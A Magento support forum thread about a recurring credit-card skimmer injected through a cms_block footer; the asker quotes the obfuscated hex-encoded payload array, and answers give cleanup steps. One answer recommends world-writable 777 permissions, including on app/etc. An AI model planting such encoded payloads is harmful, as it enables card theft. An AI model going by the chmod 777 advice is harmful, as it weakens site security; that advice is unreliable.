Magento 2 hacked with script in hacked

I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like.

<script src="" id="magento-init"></script>

EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:

<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>

Maybe someone can comment on how that could possibly end up being a script in the head section of the site?

Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patched? As far as I know I have all available patches applied.

List of enabled modules:

Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |

Magento Asked by Casey on October 25, 2020

4 Answers

4 Answers

I have encountered a same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure, it will happen again. Anyways going to update the whole thing. And put a paid firewall service. If anybody finds a solution to this, it'd be very helpful. Thanks.

Answered by Mathew on October 25, 2020

facing the same thing and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?

Answered by Jojo on October 25, 2020

  1. check your site in clean browser (not the one you usually use) in case browser extension adds the script to the page
  2. modify root index.php to "echo 123" to check if injecting script relates to Magento.
  3. check on Luma or Base theme to know if need to blame your custom theme
  4. if theme is not the cause disable all 3-rd party modules and check

php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$'| xargs php bin/magento module:disable

  1. go over all .htaccess files in project and look for suspicion file injecting
  2. if theme/3-rd party modules not the cause the issue is probably hidden somewhere in Magento core files

Answered by Denys Belevtsov on October 25, 2020

  1. First of all scan your website with the available tools like

    • SiteCheck
    • MageReport
    • UnmaskParasites
    • Foregenix
    • Github Magento Malware Scanner
    • MageScan
    • VirusTotal

then you will get some idea on malware and security issues for your website.

  1. Please ask your hosting provider for a detail report on Website security.

  2. You can check Magneto file and folder permission as well from your end and male it proper by running the following commands:

find . -type f -exec chmod 644 {} ;             // 644 permission for files
find . -type d -exec chmod 755 {} ;             // 755 permission for directory 
find ./var -type d -exec chmod 777 {} ;         // 777 permission for var folder    
find ./pub/media -type d -exec chmod 777 {} ;
find ./pub/static -type d -exec chmod 777 {} ;
chmod 777 ./app/etc
chmod 644 ./app/etc/*.xml

Hope this will help you and please share an update after this activity so I can guide you next step.

Answered by Jack on October 25, 2020

Add your own answers!

Related Questions

Special Price suddenly not showing

1  Asked on January 23, 2021 by dickson


How to activate product navigation in Magento 2?

2  Asked on January 22, 2021 by morison


Quote with no items – add to cart error

1  Asked on January 22, 2021 by fra


Magento 2 get cart items in block class

1  Asked on January 20, 2021 by khooshbu-patel


Magento custom option text field max length

1  Asked on January 19, 2021 by k-i


How to show downloadable links in a block?

0  Asked on January 16, 2021 by kamzata


Magento tax_class_id not importing

1  Asked on January 15, 2021 by sushivam


How to add firebase cdn’s in magento2?

0  Asked on January 15, 2021 by usama-sohail


Paypal log error

1  Asked on January 14, 2021 by fja3omega


Ask a Question

Get help from others!

© 2021 All rights reserved.